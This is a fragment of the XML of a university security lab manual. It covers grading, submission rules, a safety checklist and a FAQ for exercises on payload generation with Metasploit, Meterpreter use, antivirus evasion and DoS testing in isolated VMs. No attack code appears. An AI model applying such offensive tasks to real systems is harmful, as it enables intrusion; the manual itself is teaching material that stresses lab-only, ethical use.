          <w:p w14:paraId="41A1BD2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Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A12851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Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388DED5" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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of attacks in progress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D9678B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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netstat output showing connection states</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53663B5A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FFCF47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5.2 Mitigation Strategies (5 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF99A1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Discuss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C759039" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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countermeasures for each attack type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752AD9A2" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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architecture recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC10AB" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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IDS/IPS rules that would detect these attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06482A7E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Rate limiting and filtering strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992EA5C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C96436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43582F2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Physical Security Analysis (1 page) - 5 points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED483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Content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9538E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Keylogger identification techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807510B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Boot-based attack risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCE067" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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access control recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F974E1" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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USB security policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805D50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Include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB0A1F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Photos/screenshots from demonstrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02501C29" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Checklist for physical security inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654FCA7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BA3858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156D6F82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Grading Rubric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B9ABB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Total: 100 points = 5% of course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701"/>
        <w:gridCol w:w="5434"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="14919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BBCDE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07996EB0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243807D7" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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</w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="6BCF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836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Executive Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47BBA66A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4EBF97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Clarity, conciseness, key findings highlighted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="4318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505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242779B8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9754657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documentation, clear diagrams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="358A0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5F5B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Malware Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4206ED04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EBF8CD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Thorough analysis, screenshots, IoCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="607DB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F800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Payload Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="526CC27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16DE88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payloads documented, comparison provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="5A6DF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ECA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Behavioral Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31DF8F05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7E902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Detailed Process Monitor analysis, categorized findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="16C5D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75A4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Meterpreter Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2803F46A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AC4463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Commands documented with results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="5DFF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8BE9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 IoCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9A4E9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C52A95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Complete IoC list in proper format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="5B652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18AC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AV Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B75A153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BACD5D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Testing results, evasion analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="5F00E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77902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DoS Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AFA2FC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08786F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Attack documentation, mitigation discussion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="32DD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A42E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Physical Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17DF4CB5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8E86FB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Comprehensive analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34A87" w:rsidRPr="00C34A87" w14:paraId="35F52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E909C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2FEAFE6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34A8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FAEF4E1" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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19A2712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Additional Grading Criteria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA862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Formatting &amp; Professionalism (deductions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655A7D55" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Proper report structure: -5 if missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8711ED" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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properly labeled: -2 per unlabeled screenshot (max -10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C78816" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 formatted correctly: -3 per poorly formatted table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCAFC5" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Grammar and spelling: -5 for excessive errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB01B78" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Citations and references: -5 if missing sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081A8AA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Technical Accuracy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46347B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Incorrect technical explanations: -5 per error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095850A4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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critical information: -10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A6418" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Fabricated results: -100 (automatic fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7EAF41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Completeness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061635D8" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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required sections: -10 per section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C6228" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Incomplete analysis: -5 to -15 depending on severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE6555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6B475D9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8B24EB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Submission Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B81837D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Format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E2C2D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 only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Word documents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911850D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Filename: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CCS6324_Week3_Lab_StudentID_Name.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A213D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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CCS6324_Week3_Lab_1234567_JohnDoe.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B49C8A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Submission Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A35795" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Upload to university LMS (Moodle/Canvas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63A959" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Submission deadline: </w:t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Nov 2025, 23:59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03649A58" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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 submissions: -10% per day (max 3 days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581E1BC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Required Contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDB2E1" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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report (PDF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62842373" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Process Monitor logs (PML file) - if file size permits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250D816" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Screenshots folder (ZIP if separate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E674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File size limit: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50MB total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D2433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BDE7539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872B0CA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Safety Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4FD6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leaving lab, verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9AE28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VMs restored to clean snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378B23A7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malware files remain on host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE37F87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evidence saved to secure location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A05149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attack tools/processes stopped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B1F14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Network configurations reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC43FFF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understand what was learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD7EBAE" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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explain findings to instructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19796E72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043DFDB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28EC52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Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2F77A4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Malware Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D80B5" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Practical Malware Analysis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Michael Sikorski</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F6715" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Process Monitor documentation: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https://learn.microsoft.com/en-us/sysinternals/downloads/procmon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60F28DD5" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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MITRE ATT&amp;CK Framework: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9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https://attack.mitre.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54381239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Metasploit Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061FF97D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Official Documentation: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https://docs.metasploit.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13B2EFA7" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Metasploit Unleashed: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https://www.offensive-security.com/metasploit-unleashed/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52A098D5" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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msfvenom cheat sheet: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Available on Kali Linux documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761401E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DoS/DDoS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B36DD" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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hping3 man page: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34A87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 hping3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7594C507" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Cloudflare DDoS reports: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2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https://www.cloudflare.com/learning/ddos/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67578A69" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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NIST Guidelines on DDoS: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3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https://www.nist.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2465DB80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VirusTotal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A292EA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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VirusTotal API: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4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https://www.virustotal.com/gui/home/upload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61EB1DE8" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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read results: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5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https://support.virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13E733B6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16EF875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7B78C35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Frequently Asked Questions (FAQ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478AA4D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Q1: Can I use my own malware samples for analysis?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NO. Only use instructor-provided samples or payloads you generate in the lab. Never bring unknown malware into the lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2D946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Q2: What if Windows Defender doesn't detect my payload?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this finding! It's an important observation about detection limitations. Discuss why it might have evaded detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B60E0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Q3: Can I test DoS attacks against real websites?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ABSOLUTELY NOT. Only attack lab VMs on the internal network. Attacking external systems is illegal and will result in serious consequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443D8FD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Q4: What if I accidentally executed malware on my host machine?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Immediately notify the instructor, disconnect from network, and run a full antivirus scan. This is why we emphasize VM usage!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E82439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Q5: How detailed should my Process Monitor analysis be?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Focus on significant events: file creation, registry modifications, network connections. You don't need to document every single event (there will be thousands), but categorize and highlight important patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C26F08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Q6: Can I work in groups for the lab?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work together during the lab session, but the report must be individual work with your own analysis and observations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A54F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Q7: What if my VM crashes or becomes corrupted?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is why we take snapshots! Restore from snapshot and repeat the exercise. If you have persistent issues, ask the instructor for assistance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A06A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Q8: Should I include the actual malware files in my submission?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NO! Only include hashes, screenshots, and analysis. Never submit actual malware executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF2C96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E28B41A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144E3523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Academic Integrity Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17592D8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lab involves creating and analyzing malware for educational purposes only. Students must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53333A4D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 techniques ONLY in the controlled lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F507BA7" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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deploy these techniques against unauthorized systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4B425" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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the ethical boundaries of security research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FE0A9" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 any accidental policy violations immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A788E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Acknowledge any external resources used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076FAC2B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Plagiarism Policy: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Reports must be your own work. Copying from classmates or online sources without citation will result in zero marks and disciplinary action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C9329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7A9247EC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31665CF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Instructor Contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4C8ED6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 Assistance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10A360" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Hours: [Days and Times]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258689F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Email: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00C34A87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instructor@mmu.edu.my</w:t>
        </w:r>
      </w:hyperlink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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2984B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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TA: [TA Name and Contact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12894AE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Emergency Contact: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discover any security issues or have concerns about safety procedures during the lab, contact the instructor immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380AD7E8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8DE19F3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309B946" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Lab Completion Sign-Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77156BA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Declaration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD09D00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I, _________________________________ (Student Name), Student ID: ___________________,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23B1A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Hereby declare that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64789E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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have completed all lab exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52740A68" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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understand the safety procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C01CC9" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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will only use these techniques ethically and legally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D1F2B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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have restored all VMs to clean state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141676C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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have saved all required lab evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352979EB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Student Signature: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_____________________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_____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1337047D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Instructor Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3FA44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 completion verified by: _____________________</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A8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Date: _____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394C7C9" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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C34A87" w:rsidRPr="00C34A87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B966AC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DC155FF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END OF LAB MANUAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CC14C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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34A8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Stay curious. Stay ethical. Stay safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A23A5E8" w14:textId="77777777" w:rsidR="00676A80" w:rsidRDefault="00676A80"/>
    <w:sectPr w:rsidR="00676A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FA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4334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86061"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ED25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24C51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F030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54A6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E368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F752A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C7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D53E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E2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92EDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DCC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86833"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E9A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D6B2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2640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E5080"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F97A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A6D52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5846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631B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1806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E6BE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32E8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F64508"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEE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97A35"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3518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97886"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15EC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45791"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4762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6300A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="613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E202B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="363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E51ED8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC7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555EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD7A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C23FC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB32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FD1F84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DA81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DA2329"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="450E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3A372F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADD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8E5E6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B40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80059"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0826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5A11A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B94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382C4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF7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03936"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A64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A03B61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F0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270C7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B50A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655CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2E2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C94BAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59A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192745"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="651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0F0D8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3B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1F02BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C8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E7DA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47D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1340C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E0C4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A5C7977"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FB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9F78DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="841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EA3D6A"/>
